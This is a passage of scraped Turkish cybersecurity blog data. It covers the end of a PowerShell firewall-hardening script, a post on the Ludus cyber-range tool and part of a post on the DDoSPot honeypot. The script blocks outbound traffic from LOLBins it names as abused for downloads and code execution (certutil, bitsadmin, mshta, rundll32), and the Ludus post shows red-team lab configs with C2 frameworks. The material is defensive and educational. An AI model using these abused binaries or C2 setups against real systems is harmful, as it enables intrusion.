-Profile Any `\r\n\r\n -Program $ProgramPath | Out-Null\r\n\r\n }\r\n\r\n else {\r\n\r\n Write-Host \"Creating program block rule: $displayName\"\r\n\r\n New-NetFirewallRule -DisplayName $displayName `\r\n\r\n -Direction Outbound `\r\n\r\n -Action Block `\r\n\r\n -Enabled True `\r\n\r\n -Profile Any `\r\n\r\n -Program $ProgramPath | Out-Null\r\n\r\n }\r\n\r\n}\r\n\r\n# ============================\r\n\r\n# 1. SECURE FIREWALL PROFILES\r\n\r\n# ============================\r\n\r\nSet-FirewallProfileSecure -ProfileName Domain\r\n\r\nSet-FirewallProfileSecure -ProfileName Private\r\n\r\nSet-FirewallProfileSecure -ProfileName Public\r\n\r\n# Enable basic logging (you can adjust paths\/sizes as needed)\r\n\r\nWrite-Host \"Enabling firewall logging...\"\r\n\r\nSet-NetFirewallProfile -Profile Domain,Private,Public `\r\n\r\n -LogFileName '%systemroot%\\system32\\LogFiles\\Firewall\\pfirewall.log' `\r\n\r\n -LogMaxSizeKilobytes 16384 `\r\n\r\n -LogAllowed True `\r\n\r\n -LogBlocked True | Out-Null\r\n\r\n# ============================\r\n\r\n# 2. INBOUND HARDENING RULES\r\n\r\n# ============================\r\n\r\nWrite-Host \"`nConfiguring inbound hardening rules...\"\r\n\r\n# SMB\/CIFS inbound: block\r\n\r\nEnsure-PortRule -Name \"Inbound Block SMB TCP 445\" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445\r\n\r\nEnsure-PortRule -Name \"Inbound Block SMB TCP 139\" -Direction Inbound -Action Block -Protocol TCP -LocalPort 139\r\n\r\nEnsure-PortRule -Name \"Inbound Block NetBIOS UDP 137\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 137\r\n\r\nEnsure-PortRule -Name \"Inbound Block NetBIOS UDP 138\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 138\r\n\r\n# RDP inbound (TCP 3389)\r\n\r\nif ($BlockRDPInbound) {\r\n\r\n Ensure-PortRule -Name \"Inbound Block RDP TCP 3389\" -Direction Inbound -Action Block -Protocol TCP -LocalPort 3389\r\n\r\n}\r\n\r\n# WinRM inbound (5985\/5986)\r\n\r\nEnsure-PortRule -Name \"Inbound Block WinRM TCP 5985\" -Direction Inbound -Action Block -Protocol TCP -LocalPort 5985\r\n\r\nEnsure-PortRule -Name \"Inbound Block WinRM TCP 5986\" -Direction Inbound -Action Block -Protocol TCP -LocalPort 5986\r\n\r\n# WMI\/DCOM RPC endpoint (TCP 135)\r\n\r\nEnsure-PortRule -Name \"Inbound Block RPC Endpoint Mapper TCP 135\" -Direction Inbound -Action Block -Protocol TCP -LocalPort 135\r\n\r\n# Discovery \/ legacy protocols\r\n\r\nEnsure-PortRule -Name \"Inbound Block SSDP UDP 1900\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 1900\r\n\r\nEnsure-PortRule -Name \"Inbound Block mDNS UDP 5353\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 5353\r\n\r\nEnsure-PortRule -Name \"Inbound Block LLMNR UDP 5355\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 5355\r\n\r\nEnsure-PortRule -Name \"Inbound Block WSD UDP 3702\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 3702\r\n\r\nEnsure-PortRule -Name \"Inbound Block TFTP UDP 69\" -Direction Inbound -Action Block -Protocol UDP -LocalPort 69\r\n\r\n# (Optional) ICMP echo blocking could be added here if desired.\r\n\r\n# ============================\r\n\r\n# 3. OUTBOUND SMB RESTRICTIONS\r\n\r\n# ============================\r\n\r\nWrite-Host \"`nConfiguring outbound SMB controls...\"\r\n\r\n# Allow outbound SMB only to approved servers\r\n\r\nif ($AllowedSMBServers.Count -gt 0) {\r\n\r\n foreach ($server in $AllowedSMBServers) {\r\n\r\n Ensure-PortRule -Name \"Outbound Allow SMB to $server\" `\r\n\r\n -Direction Outbound -Action Allow -Protocol TCP -RemotePort 445 -RemoteAddress $server\r\n\r\n }\r\n\r\n}\r\n\r\n# Block all other outbound SMB\r\n\r\nEnsure-PortRule -Name \"Outbound Block SMB TCP 445 All\" `\r\n\r\n -Direction Outbound -Action Block -Protocol TCP -RemotePort 445 -RemoteAddress \"Any\"\r\n\r\n# ============================\r\n\r\n# 4. OUTBOUND DISCOVERY \/ LEGACY PROTOCOL BLOCKS\r\n\r\n# ============================\r\n\r\nWrite-Host \"`nConfiguring outbound discovery protocol blocks...\"\r\n\r\nEnsure-PortRule -Name \"Outbound Block SSDP UDP 1900\" -Direction Outbound -Action Block -Protocol UDP -RemotePort 1900\r\n\r\nEnsure-PortRule -Name \"Outbound Block mDNS UDP 5353\" -Direction Outbound -Action Block -Protocol UDP -RemotePort 5353\r\n\r\nEnsure-PortRule -Name \"Outbound Block LLMNR UDP 5355\" -Direction Outbound -Action Block -Protocol UDP -RemotePort 5355\r\n\r\nEnsure-PortRule -Name \"Outbound Block WSD UDP 3702\" -Direction Outbound -Action Block -Protocol UDP -RemotePort 3702\r\n\r\nEnsure-PortRule -Name \"Outbound Block TFTP UDP 69\" -Direction Outbound -Action Block -Protocol UDP -RemotePort 69\r\n\r\n# ============================\r\n\r\n# 5. OUTBOUND PROGRAM-LEVEL BLOCKS (LOLBINS)\r\n\r\n# ============================\r\n\r\nWrite-Host \"`nConfiguring outbound program-level blocks (LOLBins)...\"\r\n\r\n$system32 = Join-Path $env:WINDIR \"System32\"\r\n\r\n$syswow64 = Join-Path $env:WINDIR \"SysWOW64\"\r\n\r\n$psv1Path = Join-Path $system32 \"WindowsPowerShell\\v1.0\"\r\n\r\n$pswowv1 = Join-Path $syswow64 \"WindowsPowerShell\\v1.0\"\r\n\r\n$ProgramBlockList = @(\r\n\r\n # PowerShell\r\n\r\n @{ Name = \"Block Outbound PowerShell (x64)\"; Path = Join-Path $psv1Path \"powershell.exe\" },\r\n\r\n @{ Name = \"Block Outbound PowerShell ISE (x64)\"; Path = Join-Path $psv1Path \"powershell_ise.exe\" },\r\n\r\n @{ Name = \"Block Outbound PowerShell (x86)\"; Path = Join-Path $pswowv1 \"powershell.exe\" },\r\n\r\n @{ Name = \"Block Outbound PowerShell ISE (x86)\"; Path = Join-Path $pswowv1 \"powershell_ise.exe\" },\r\n\r\n # Windows scripting\r\n\r\n @{ Name = \"Block Outbound wscript\"; Path = Join-Path $system32 \"wscript.exe\" },\r\n\r\n @{ Name = \"Block Outbound cscript\"; Path = Join-Path $system32 \"cscript.exe\" },\r\n\r\n @{ Name = \"Block Outbound mshta\"; Path = Join-Path $system32 \"mshta.exe\" },\r\n\r\n # Downloaders \/ transfer tools\r\n\r\n @{ Name = \"Block Outbound certutil\"; Path = Join-Path $system32 \"certutil.exe\" },\r\n\r\n @{ Name = \"Block Outbound bitsadmin\"; Path = Join-Path $system32 \"bitsadmin.exe\" },\r\n\r\n @{ Name = \"Block Outbound curl\"; Path = Join-Path $system32 \"curl.exe\" },\r\n\r\n @{ Name = \"Block Outbound ftp\"; Path = Join-Path $system32 \"ftp.exe\" },\r\n\r\n @{ Name = \"Block Outbound tftp\"; Path = Join-Path $system32 \"tftp.exe\" },\r\n\r\n # WMI and management\r\n\r\n @{ Name = \"Block Outbound wmic\"; Path = Join-Path $system32 \"wbem\\wmic.exe\" },\r\n\r\n # LOLBins commonly abused for code execution\r\n\r\n @{ Name = \"Block Outbound regsvr32\"; Path = Join-Path $system32 \"regsvr32.exe\" },\r\n\r\n @{ Name = \"Block Outbound rundll32\"; Path = Join-Path $system32 \"rundll32.exe\" },\r\n\r\n # Dev \/ build tools\r\n\r\n @{ Name = \"Block Outbound MSBuild\"; Path = Join-Path $system32 \"MSBuild.exe\" },\r\n\r\n @{ Name = \"Block Outbound msxsl\"; Path = Join-Path $system32 \"msxsl.exe\" },\r\n\r\n # Injection &amp; remote tools\r\n\r\n @{ Name = \"Block Outbound mavinject\"; Path = Join-Path $system32 \"mavinject.exe\" },\r\n\r\n # Remote admin \/ post-ex tools (if present)\r\n\r\n @{ Name = \"Block Outbound PsExec\"; Path = \"C:\\Windows\\System32\\psexec.exe\" },\r\n\r\n @{ Name = \"Block Outbound PAExec\"; Path = \"C:\\Windows\\System32\\paexec.exe\" },\r\n\r\n # Quick Assist (if present)\r\n\r\n @{ Name = \"Block Outbound Quick Assist\"; Path = Join-Path $system32 \"quickassist.exe\" }\r\n\r\n)\r\n\r\nforeach ($item in $ProgramBlockList) {\r\n\r\n Ensure-ProgramBlockRule -Name $item.Name -ProgramPath $item.Path\r\n\r\n}\r\n\r\nWrite-Host \"`nFirewall hardening complete.\" -ForegroundColor Green<\/code><\/pre>","excerpt":"","created_at":"2025-11-26 17:34:05","updated_at":"2026-09-07 06:59:33","category_id":7,"view_count":735,"reading_time":10,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-11-26 14:34:00","featured_image":"2120641a2116dffa518b171cb74b0a1e.png","slug":"windows-11-guvenlik-duvari-lolbin-engelleme-scripti","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":347,"title":"Ludus: HomeLab ve CyberRange \u0130\u00e7in G\u00fc\u00e7l\u00fc Altyap\u0131 \u00c7\u00f6z\u00fcm\u00fc","content":"<h2>Ludus Nedir?<\/h2>\n<p>Ludus, g&uuml;venlik profesyonelleri ve sistem y&ouml;neticileri i&ccedil;in tasarlanm\u0131\u015f, <strong>tek komutla karma\u015f\u0131k test ortamlar\u0131<\/strong> olu\u015fturabilen a&ccedil;\u0131k kaynakl\u0131 bir altyap\u0131 otomasyon platformudur. &Ouml;zellikle HomeLab, CyberRange, penetrasyon testi ve e\u011fitim ortamlar\u0131 i&ccedil;in idealdir.<\/p>\n<p><iframe src=\"https:\/\/www.youtube.com\/embed\/d5pdiVSkAyI\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<h2>Temel &Ouml;zellikler ve Yetenekler<\/h2>\n<h3>1. <strong>A\u011f Y&ouml;netimi<\/strong><\/h3>\n<pre><code class=\"language-yaml\"># &Ouml;rnek VLAN yap\u0131land\u0131rmas\u0131\nnetworks:\n  - name: \"DMZ_Network\"\n    vlan_id: 10\n    subnet: \"10.10.10.0\/24\"\n    gateway: \"10.10.10.1\"\n    \n  - name: \"Internal_Network\"\n    vlan_id: 20\n    subnet: \"192.168.1.0\/24\"\n    gateway: \"192.168.1.1\"\n    \n  - name: \"Management\"\n    vlan_id: 30\n    subnet: \"172.16.0.0\/24\"\n    gateway: \"172.16.0.1\"\n<\/code><\/pre>\n<h3>2. <strong>VM Da\u011f\u0131t\u0131m Kapasitesi<\/strong><\/h3>\n<ul>\n<li>Host makinenin kaynaklar\u0131na ba\u011fl\u0131 olarak s\u0131n\u0131rs\u0131z VM<\/li>\n<li>Otomatik kaynak y&ouml;netimi<\/li>\n<li>Dinamik bellek ve CPU tahsisi<\/li>\n<\/ul>\n<h3>3. <strong>G&uuml;venlik Duvar\u0131 Kurallar\u0131<\/strong><\/h3>\n<pre><code class=\"language-bash\"># &Ouml;rnek firewall kural\u0131 ekleme\nludus firewall add --source 10.10.10.0\/24 \\\n                   --destination 192.168.1.0\/24 \\\n                   --port 443 \\\n                   --protocol tcp \\\n                   --action allow\n<\/code><\/pre>\n<h2>Kurulum ve Ba\u015flang\u0131&ccedil;<\/h2>\n<h3>Sistem Gereksinimleri<\/h3>\n<pre><code class=\"language-bash\"># Minimum Gereksinimler\n- CPU: 8+ Core\n- RAM: 32GB+ (64GB &ouml;nerilir)\n- Disk: 500GB+ SSD\n- OS: Ubuntu 20.04\/22.04 veya Debian 11\n- Virtualization: KVM\/QEMU deste\u011fi\n<\/code><\/pre>\n<h3>H\u0131zl\u0131 Kurulum<\/h3>\n<pre><code class=\"language-bash\"># 1. Ludus'u indirin ve kurun\ncurl -fsSL https:\/\/ludus.cloud\/install.sh | sudo bash\n\n# 2. Ba\u015flang\u0131&ccedil; yap\u0131land\u0131rmas\u0131\nludus init\n\n# 3. \u0130lk range'i olu\u015fturun\nludus range create --name \"test-lab\" \\\n                   --config .\/lab-config.yml\n\n# 4. VM'leri ba\u015flat\u0131n\nludus range deploy test-lab\n<\/code><\/pre>\n<h2>Kullan\u0131m Senaryolar\u0131<\/h2>\n<h3>1. <strong>Active Directory Test Ortam\u0131<\/strong><\/h3>\n<pre><code class=\"language-yaml\"># ad-lab.yml\nvms:\n  - name: DC01\n    os: windows-server-2019\n    role: domain-controller\n    ip: 192.168.1.10\n    ansible_roles:\n      - active_directory\n      - certificate_services\n      \n  - name: CLIENT01\n    os: windows-10\n    role: domain-member\n    ip: 192.168.1.100\n    ansible_roles:\n      - domain_join\n      - corporate_apps\n<\/code><\/pre>\n<h3>2. <strong>Red Team Altyap\u0131s\u0131<\/strong><\/h3>\n<pre><code class=\"language-yaml\"># redteam-infra.yml\nvms:\n  - name: C2-Server\n    os: kali-linux\n    ip: 10.10.10.5\n    ansible_roles:\n      - cobalt_strike\n      - empire\n      - metasploit\n      \n  - name: Redirector\n    os: ubuntu-22.04\n    ip: 10.10.10.10\n    ansible_roles:\n      - nginx_redirector\n      - iptables_rules\n<\/code><\/pre>\n<h3>3. <strong>SIEM\/SOC Test Ortam\u0131<\/strong><\/h3>\n<pre><code class=\"language-yaml\"># soc-lab.yml\nvms:\n  - name: SIEM-Server\n    os: ubuntu-22.04\n    ip: 172.16.0.10\n    resources:\n      cpu: 8\n      ram: 16384\n    ansible_roles:\n      - elasticsearch\n      - kibana\n      - logstash\n      \n  - name: Log-Collector\n    os: ubuntu-22.04\n    ip: 172.16.0.20\n    ansible_roles:\n      - beats\n      - syslog_ng\n<\/code><\/pre>\n<h2>Geli\u015fmi\u015f &Ouml;zellikler<\/h2>\n<h3>Ansible Entegrasyonu<\/h3>\n<pre><code class=\"language-bash\"># Ansible role ekleme\nludus ansible add-role --vm DC01 \\\n                      --role .\/roles\/vulnerable_ad\n\n# T&uuml;m VM'lere rol uygulama\nludus ansible apply --range test-lab\n<\/code><\/pre>\n<h3>DNS Y&ouml;netimi<\/h3>\n<pre><code class=\"language-bash\"># &Ouml;zel DNS kayd\u0131 ekleme\nludus dns add --domain \"evil.corp\" \\\n              --ip 192.168.1.100 \\\n              --type A\n\n# Wildcard DNS\nludus dns add --domain \"*.phishing.local\" \\\n              --ip 10.10.10.50 \\\n              --type A\n<\/code><\/pre>\n<h3>Snapshot ve Backup<\/h3>\n<pre><code class=\"language-bash\"># Snapshot olu\u015fturma\nludus snapshot create --range test-lab \\\n                     --name \"before-pentest\"\n\n# Geri y&uuml;kleme\nludus snapshot restore --range test-lab \\\n                      --name \"before-pentest\"\n<\/code><\/pre>\n<h2>Performans Optimizasyonu<\/h2>\n<h3>Resource Pool Y&ouml;netimi<\/h3>\n<pre><code class=\"language-yaml\"># resource-pools.yml\npools:\n  high_performance:\n    cpu_overcommit: 1.5\n    ram_overcommit: 1.2\n    storage: ssd_pool\n    \n  standard:\n    cpu_overcommit: 2.0\n    ram_overcommit: 1.5\n    storage: hybrid_pool\n<\/code><\/pre>\n<h3>Network Optimization<\/h3>\n<pre><code class=\"language-bash\"># Jumbo frames etkinle\u015ftirme\nludus network optimize --mtu 9000 \\\n                      --offload enable\n<\/code><\/pre>\n<h2>G&uuml;venlik En \u0130yi Uygulamalar\u0131<\/h2>\n<h3>1. <strong>\u0130zolasyon<\/strong><\/h3>\n<pre><code class=\"language-bash\"># Range izolasyonu\nludus range isolate --name sensitive-lab \\\n                   --level strict\n<\/code><\/pre>\n<h3>2. <strong>Eri\u015fim Kontrol&uuml;<\/strong><\/h3>\n<pre><code class=\"language-bash\"># Kullan\u0131c\u0131 ekleme\nludus user add --username pentester \\\n               --role operator \\\n               --range test-lab\n\n# SSH key ekleme\nludus ssh add-key --user pentester \\\n                  --key ~\/.ssh\/id_rsa.pub\n<\/code><\/pre>\n<h2>\u0130pu&ccedil;lar\u0131 ve P&uuml;f Noktalar\u0131<\/h2>\n<h3>H\u0131zl\u0131 Template Olu\u015fturma<\/h3>\n<pre><code class=\"language-bash\"># Mevcut ortamdan template\nludus template create --from-range test-lab \\\n                     --name \"ad-vulnerable-v1\"\n\n# Template'den yeni range\nludus range create --from-template ad-vulnerable-v1 \\\n                  --name \"student-lab-01\"\n<\/code><\/pre>\n<h3>Monitoring ve Logging<\/h3>\n<pre><code class=\"language-bash\"># Prometheus metrics etkinle\u015ftirme\nludus monitoring enable --type prometheus \\\n                       --port 9090\n\n# Log toplama\nludus logs collect --range test-lab \\\n                   --output .\/logs\/\n<\/code><\/pre>\n<h2>Alternatiflerle Kar\u015f\u0131la\u015ft\u0131rma<\/h2>\n<table>\n<thead>\n<tr>\n<th><strong>&Ouml;zellik<\/strong><\/th>\n<th><strong>Ludus<\/strong><\/th>\n<th><strong>Vagrant<\/strong><\/th>\n<th><strong>Terraform<\/strong><\/th>\n<th><strong>Proxmox<\/strong><\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><strong>Kurulum Kolayl\u0131\u011f\u0131<\/strong><\/td>\n<td>\u2b50\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50<\/td>\n<\/tr>\n<tr>\n<td><strong>A\u011f Y&ouml;netimi<\/strong><\/td>\n<td>\u2b50\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50\u2b50<\/td>\n<\/tr>\n<tr>\n<td><strong>Otomasyon<\/strong><\/td>\n<td>\u2b50\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50<\/td>\n<\/tr>\n<tr>\n<td><strong>GUI<\/strong><\/td>\n<td>\u2b50\u2b50<\/td>\n<td>\u2b50<\/td>\n<td>\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50\u2b50\u2b50<\/td>\n<\/tr>\n<tr>\n<td><strong>CyberRange Odakl\u0131<\/strong><\/td>\n<td>\u2b50\u2b50\u2b50\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50<\/td>\n<td>\u2b50\u2b50\u2b50<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>&Ouml;rnek Senaryolar<\/h2>\n<h3>Ransomware Sim&uuml;lasyonu<\/h3>\n<pre><code class=\"language-yaml\"># ransomware-sim.yml\nscenario:\n  name: \"WannaCry Simulation\"\n  stages:\n    - deploy_vulnerable_systems\n    - setup_network_shares\n    - deploy_ransomware_simulator\n    - monitor_propagation\n    - collect_iocs\n<\/code><\/pre>\n<h3>Zero Trust Lab<\/h3>\n<pre><code class=\"language-yaml\"># zero-trust.yml\narchitecture:\n  - micro_segmentation: enabled\n  - identity_verification: continuous\n  - encryption: end_to_end\n  - monitoring: comprehensive\n<\/code><\/pre>\n<h2>&nbsp;<\/h2>\n<p>Ludus, &ouml;zellikle g&uuml;venlik profesyonelleri i&ccedil;in tasarlanm\u0131\u015f, <strong>kullan\u0131m kolayl\u0131\u011f\u0131 ve g&uuml;&ccedil;l&uuml; &ouml;zellikler<\/strong> sunan m&uuml;kemmel bir HomeLab &ccedil;&ouml;z&uuml;m&uuml;d&uuml;r. Tek komutla karma\u015f\u0131k ortamlar kurabilme yetene\u011fi, onu rakiplerinden ay\u0131ran en &ouml;nemli &ouml;zelli\u011fidir.<\/p>\n<h3>Kimler \u0130&ccedil;in \u0130deal?<\/h3>\n<ul>\n<li><strong>Red Team<\/strong> uzmanlar\u0131<\/li>\n<li><strong>Blue Team<\/strong> analistleri<\/li>\n<li><strong>E\u011fitmenler<\/strong> ve &ouml;\u011frenciler<\/li>\n<li><strong>G&uuml;venlik ara\u015ft\u0131rmac\u0131lar\u0131<\/strong><\/li>\n<li><strong>HomeLab<\/strong> merakl\u0131lar\u0131<\/li>\n<\/ul>\n<p><strong>Tavsiye<\/strong>: E\u011fer d&uuml;zenli olarak test ortamlar\u0131 kuruyorsan\u0131z veya g&uuml;venlik e\u011fitimleri veriyorsan\u0131z, Ludus'u mutlaka denemelisiniz. Zaman kazand\u0131rmas\u0131 ve otomasyon yetenekleri, yat\u0131r\u0131m\u0131n\u0131z\u0131 k\u0131sa s&uuml;rede amorti edecektir.<\/p>","excerpt":"Ludus, g\u00fcvenlik profesyonelleri ve sistem y\u00f6neticileri i\u00e7in tasarlanm\u0131\u015f, tek komutla karma\u015f\u0131k test ortamlar\u0131 olu\u015fturabilen a\u00e7\u0131k kaynakl\u0131 bir altyap\u0131 otomasyon platformudur. \u00d6zellikle HomeLab, CyberRange, penetrasyon testi ve e\u011fitim ortamlar\u0131 i\u00e7in idealdir.","created_at":"2025-11-26 17:22:14","updated_at":"2026-09-08 00:15:27","category_id":7,"view_count":618,"reading_time":4,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2025-11-26 14:22:00","featured_image":"c95a000a341afe8fdd956f636840605f.png","slug":"ludus-homelab-ve-cyberrange-icin-guclu-altyapi-cozumu","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":340,"title":"DDoSPot: DDoS Sald\u0131r\u0131lar\u0131n\u0131 Anlaman\u0131n Etik Yolu","content":"<p>Dijital D&uuml;nyan\u0131n G&ouml;lge Ger&ccedil;e\u011fi: DDoS Sald\u0131r\u0131lar\u0131<\/p>\n<p><iframe src=\"https:\/\/www.youtube.com\/embed\/Bl64fjEITmA\" width=\"560\" height=\"314\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p>\u0130nternetin bu kadar hayat\u0131m\u0131z\u0131n merkezinde oldu\u011fu bir d&ouml;nemde, siber g&uuml;venlik art\u0131k hepimizin ortak sorumlulu\u011fu. DDoS (Distributed Denial of Service) sald\u0131r\u0131lar\u0131, dijital d&uuml;nyan\u0131n en yayg\u0131n ve y\u0131k\u0131c\u0131 tehditlerinden biri olarak kar\u015f\u0131m\u0131za &ccedil;\u0131k\u0131yor. Peki bu sald\u0131r\u0131lar\u0131 anlamak, analiz etmek ve korunma y&ouml;ntemleri geli\u015ftirmek i&ccedil;in etik bir yol var m\u0131?<\/p>\n<p>DDoSPot Nedir ve Neden &Ouml;nemli?<\/p>\n<p>DDoSPot, a&ccedil;\u0131k kaynak kodlu bir \"honeypot\" (bal kavanozu) projesi. Temel mant\u0131\u011f\u0131, dijital bir tuzak kurarak sald\u0131rganlar\u0131 kendi a\u011f\u0131n\u0131z\u0131n kontroll&uuml; bir b&ouml;l&uuml;m&uuml;ne &ccedil;ekmek ve onlar\u0131n y&ouml;ntemlerini anlamak.&nbsp;<\/p>\n<p>Prensip olarak \u015funu s&ouml;yleyebiliriz: \"Sald\u0131rganlar\u0131 kendi se&ccedil;ti\u011finiz sahneye davet edip, onlar\u0131n oyun kurallar\u0131n\u0131 &ouml;\u011frenirsiniz.\"<\/p>\n<p>&nbsp;DDoSPot'un Etik Kullan\u0131m Alanlar\u0131:<\/p>\n<p>&nbsp;1. E\u011fitim ve Fark\u0131ndal\u0131k<br>- Siber g&uuml;venlik &ouml;\u011frencileri i&ccedil;in canl\u0131 laboratuvar ortam\u0131<br>- \u015eirket &ccedil;al\u0131\u015fanlar\u0131na y&ouml;nelik siber g&uuml;venlik e\u011fitimleri<br>- DDoS sald\u0131r\u0131 mekanizmalar\u0131n\u0131 anlama f\u0131rsat\u0131<\/p>\n<p>2. Kurumsal G&uuml;venlik Geli\u015ftirme<\/p>\n<p>&nbsp;Bu kod sadece kendi a\u011f\u0131n\u0131z\u0131 korumak i&ccedil;indir<br>&nbsp;Sald\u0131r\u0131 y&ouml;ntemlerini &ouml;\u011fren &rarr; Savunma stratejileri geli\u015ftir<\/p>\n<p>&nbsp;<\/p>\n<p>3. Ara\u015ft\u0131rma ve Geli\u015ftirme<br>- Yeni sald\u0131r\u0131 vekt&ouml;rlerini tespit etme<br>- G&uuml;venlik yaz\u0131l\u0131mlar\u0131n\u0131 test etme<br>- Savunma mekanizmalar\u0131 geli\u015ftirme<\/p>\n<p>\"Beyaz \u015eapkal\u0131\" Hacker Etiketi<\/p>\n<p>DDoSPot'u kullanan g&uuml;venlik uzmanlar\u0131na genellikle \"beyaz \u015fapkal\u0131 hacker\" deniyor. Bunun anlam\u0131:<\/p>\n<p>- Ama&ccedil;: Sistemleri g&uuml;&ccedil;lendirmek<br>- Y&ouml;ntem: Etik kurallar &ccedil;er&ccedil;evesinde testler yapmak<br>- Sonu&ccedil;: Daha g&uuml;venli bir dijital ekosistem<\/p>\n<p>DDoSPot Nas\u0131l &Ccedil;al\u0131\u015f\u0131yor?<\/p>\n<p>Basit bir analojiyle a&ccedil;\u0131klayal\u0131m:<\/p>\n<p>\"Evinize h\u0131rs\u0131z girebilecek t&uuml;m pencereleri &ouml;nceden tespit edip, bu pencerelere alarm sistemi kurmak gibi d&uuml;\u015f&uuml;nebilirsiniz.\"<\/p>\n<p>&Ccedil;al\u0131\u015fma prensibi:<br>1. Kontroll&uuml; tuzaklar kurar<br>2. Sald\u0131r\u0131 verilerini toplar<br>3. Sald\u0131r\u0131 modellerini analiz eder<br>4. Savunma stratejileri &ouml;nerir<\/p>\n<p>Neden DDoSPot Kullanmal\u0131y\u0131z?<\/p>\n<p>1. Proaktif G&uuml;venlik Yakla\u015f\u0131m\u0131<br>- \"Sald\u0131r\u0131 olursa hallederiz\" yerine<br>- \"Sald\u0131r\u0131 olmadan &ouml;nlem alal\u0131m\" mant\u0131\u011f\u0131<\/p>\n<p>2. Ger&ccedil;ek Zamanl\u0131 Tehdit \u0130stihbarat\u0131<br>python<\/p>\n<p>&nbsp;Bu sadece bir sim&uuml;lasyon<br>saldiri_tespiti = {<br>&nbsp; &nbsp; \"kaynak_ip\": \"loglan\u0131r\",<br>&nbsp; &nbsp; \"saldiri_turu\": \"analiz_edilir\",&nbsp;<br>&nbsp; &nbsp; \"zaman_damgasi\": \"kaydedilir\"<br>}<\/p>\n<p>&nbsp;<\/p>\n<p><br>3. Maliyet Etkin &Ccedil;&ouml;z&uuml;m<br>- A&ccedil;\u0131k kaynak kodlu ve &uuml;cretsiz<br>- Kurumsal g&uuml;venlik &ccedil;&ouml;z&uuml;mlerine g&ouml;re daha ekonomik<\/p>\n<p>tik S\u0131n\u0131rlar ve Sorumluluk<\/p>\n<p>DDoSPot gibi ara&ccedil;lar\u0131 kullan\u0131rken her zaman \u015fu ilkelere ba\u011fl\u0131 kalmal\u0131y\u0131z:<\/p>\n<p>&nbsp;Yap\u0131lmas\u0131 Gerekenler:<br>- Sadece kendi a\u011f\u0131n\u0131zda test yap\u0131n<br>- E\u011fitim ve ara\u015ft\u0131rma ama&ccedil;l\u0131 kullan\u0131n<br>- Yasalara uygun hareket edin<\/p>\n<p>Yap\u0131lmamas\u0131 Gerekenler:<br>- Ba\u015fkalar\u0131n\u0131n sistemlerini test etmeyin<br>- K&ouml;t&uuml; niyetli ama&ccedil;larla kullanmay\u0131n<br>- Yasal s\u0131n\u0131rlar\u0131 a\u015fmay\u0131n<\/p>\n<p>Ba\u015far\u0131 Hikayeleri<\/p>\n<p>&Ouml;rnek 1: Bir finans kurumu, DDoSPot ile kendi altyap\u0131s\u0131n\u0131 test ederek, olas\u0131 bir sald\u0131r\u0131da m&uuml;\u015fteri hizmetlerinin kesintisiz devam etmesini sa\u011flad\u0131.<\/p>\n<p>&Ouml;rnek 2: Bir &uuml;niversite, siber g&uuml;venlik b&ouml;l&uuml;m&uuml; &ouml;\u011frencileri i&ccedil;in DDoSPot'u kullanarak canl\u0131 laboratuvar ortam\u0131 olu\u015fturdu.<\/p>\n<p>Gelece\u011fin Siber G&uuml;venlik Uzmanlar\u0131 \u0130&ccedil;in<\/p>\n<p>DDoSPot, siber g&uuml;venlik alan\u0131nda kariyer hedefleyenler i&ccedil;in m&uuml;kemmel bir &ouml;\u011frenme arac\u0131. Gen&ccedil; uzmanlara:<\/p>\n<p>- Ger&ccedil;ek d&uuml;nya senaryolar\u0131n\u0131 deneyimleme f\u0131rsat\u0131<br>- Etik hackleme tekniklerini &ouml;\u011frenme imkan\u0131<br>- Proaktif g&uuml;venlik yakla\u015f\u0131m\u0131n\u0131 benimseme \u015fans\u0131<\/p>\n<p>sunuyor.<\/p>\n<p>Temel &Ouml;zellikleri:<\/p>\n<p>&nbsp;1. Sald\u0131r\u0131 Tespiti<br>- &Ccedil;e\u015fitli DDoS sald\u0131r\u0131 t&uuml;rlerini tespit eder<br>- UDP flood, TCP SYN flood, HTTP flood<br>- DNS amplification sald\u0131r\u0131lar\u0131<br>- NTP reflection sald\u0131r\u0131lar\u0131<\/p>\n<p>&nbsp;2. Protokol Destekleri<\/p>\n<p>&nbsp;Desteklenen protokoller:<br>- HTTP\/HTTPS<br>- DNS<br>- NTP<br>- SSDP<br>- Chargen<br>- Memcached<br>- ve di\u011ferleri...<\/p>\n<p><br>&nbsp;3. Analiz ve Raporlama<br>- Sald\u0131r\u0131 kaynak IP'lerini loglar<br>- Sald\u0131r\u0131 trafi\u011fini analiz eder<br>- Ger&ccedil;ek zamanl\u0131 istatistikler sunar<\/p>\n<p>&nbsp;Kurulum ve Kullan\u0131m<\/p>\n<p>&nbsp;Kurulum:<\/p>\n<p>&nbsp;GitHub'dan klonla<br>git clone https:\/\/github.com\/aelth\/ddospot.git<br>cd ddospot<\/p>\n<p>&nbsp;Gereksinimleri kur<br>pip install -r requirements.txt<\/p>\n<p><br>&nbsp;&Ccedil;al\u0131\u015ft\u0131rma:<\/p>\n<p>&nbsp;Temel kullan\u0131m<br>python 